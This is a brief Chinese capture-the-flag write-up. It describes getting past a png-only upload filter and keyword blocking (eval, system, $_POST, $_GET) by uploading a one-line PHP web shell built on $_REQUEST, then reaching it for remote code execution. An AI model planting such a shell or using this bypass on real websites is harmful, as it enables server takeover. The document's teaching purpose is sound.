思路

先查看源代码,发现限制上传png

直接上传png的图片马,回显null,发现对eval,system还有$_POST和$_GET进行过滤,$_REQUEST还可以用

替换图片马中的一句话,把文件后缀改成php,成功上传

<?php $_REQUEST[0]($_REQUEST[1]);?>

在这里插入图片描述
访问/upload/shell.php,直接rce拿到flag

总结

…